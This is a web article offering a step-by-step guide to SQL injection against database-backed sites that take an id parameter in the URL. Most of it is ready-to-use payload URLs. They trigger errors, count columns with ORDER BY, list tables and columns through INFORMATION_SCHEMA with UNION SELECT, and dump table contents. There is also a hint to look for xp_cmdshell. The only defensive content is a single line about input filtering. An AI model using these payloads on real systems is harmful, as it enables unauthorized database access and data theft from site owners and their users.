sql-injection guide

» Articles / Code » ICT-security » sql-injection guide

SQL-injection in a nutshell

Most sites use a database for their backend system. In the url of these sites you can often find GET-data, like example.com?textid=4. This usually means that this number '4' is used somewhere in a database query. (another option would be that this number is used to look for a file with this name, but lets assume that this a database driven site)

Modifying that statement could produce an error,try for example a very high value, or some special characters, or try a letter instead of a number; if the column is of type 'int' and you feed it a character it will most likely produce an error , which is what we're looking for. This error shows probably too much information, like the databasetype, the tablename, or even shows the complete query. This all depends on the measures that the coder or server-admin has taken. In php for example you can easily suppres error-messages by adding a '@' in front of a function. Filtering/validation of the 'GET' or 'POST' data will even is even a better way to avoid these mistakes (protip: filter everything, except numbers; if you set up a server/site this way, then its very unlikely that any attempt to sql-injection will work.)

Once you know that the website is vulnerable, the are a few steps to take:

* find the right format to execute query's, like do you have to use some extra
) , " , ' or ;
* get table names
* get more information about the DB, like what is in INFORMATION_SCHEMA.
* test if there are more vulnerabilities, like stored procedures, master..Xp_cmdshell (knowing this could save some time ;)
* execute queries to the tables you want.
* make sure there is some way for you to read the output.
SQL commands, quick reference

ORDER BY: Tells the website which column to display first on the webpage that you are currently viewing.
SELECT : Specifies certain information in a table.
UPDATE : Changes existing information in a column of a table.
AND : Both conditions must be true in order for a command to be carried out.
OR : Only one condition must be true in order for a command to be carried out.
-- : Ends your series of commands.
+ : Use the plus sign instead of a space.

0. check if the site is vulnerable

Many url's look something like this: www.domain.com?id=10

TRY:

$~> www.mydomain.com?id=10+AND+1=0--

This should always result to untrue and produce a query-error if vulnerable. This probably gives you a clue about the database and such. If not then error-messages have been turned of or some other other measures have been taken.

(or)
TRY:

www.mydomain.com/home.asp?id=10+HAVING+1=1--

This will result in a error like this:

Column 'table.column' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

or

Microsoft JET Database Engine ...

1. watch the query-error carefully. Are some extra ', ", ), etc needed?

2. how many columns are displayed on the page?

Add this to the url:
+ORDER+BY+1--
example:

www.mydomain.net/home.asp?id=10+ORDER+BY+1--

This tells the page to show column 1 first.
TRY:

+ORDER+BY+2--
+ORDER+BY+3--
etc.

until you receive an error. Now you know how many columns there are in this table.

3. INFORMATION_SCHEMA

get information from the information_schema about this table:
TRY:

www.mydomain.net/home.asp?id=-10+UNION+SELECT+1,table_name,3,4+FROM+INFORMATION_SCHEMA.TABLES--

This probably shows some extra numbers and word(s) on the site.
1,table_name,3,4 are the columns, column 2 shows the tablename. This can be tried for every number, like:
1,2,table_name,4

4. Find the right table

TRY: (www.mydomain.net/home.asp?)

id=-10+UNION+SELECT+1,table_name,3,4+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_name>'KnownTable'--

'KnownTable' should be replaced by the tablename that you've figured out. This lets you 'navigate' trough the tables.

Repeat step 3. if necessary

5. Get column names

TRY:

www.mydomain.net/home.asp?-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='KnownTable'--

then 'navigate' the columns

-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='KnownTable'+AND+column_name>'KnownColumn'--

This shows the columnname after KnownColumn

6. showing output

Use the UNION statement to 'add' your query. Use the table and columnnames that you've found.
TRY:

www.mydomain.net/home.asp?-1+UNION+SELECT+1,knownColumn,3,4+FROM+KnownTable--

this will most likely show some content from that column (let's say we call it 'SomeData')

TRY:

www.mydomain.net/home.asp?-1+UNION+SELECT+1,AnotherColumn,3,4+FROM+KnownTable+WHERE+KnownColumn='SomeData'--

or possibly:

-1+UNION+SELECT+*+FROM+KnownTable+WHERE+KnownColumn='SomeData'--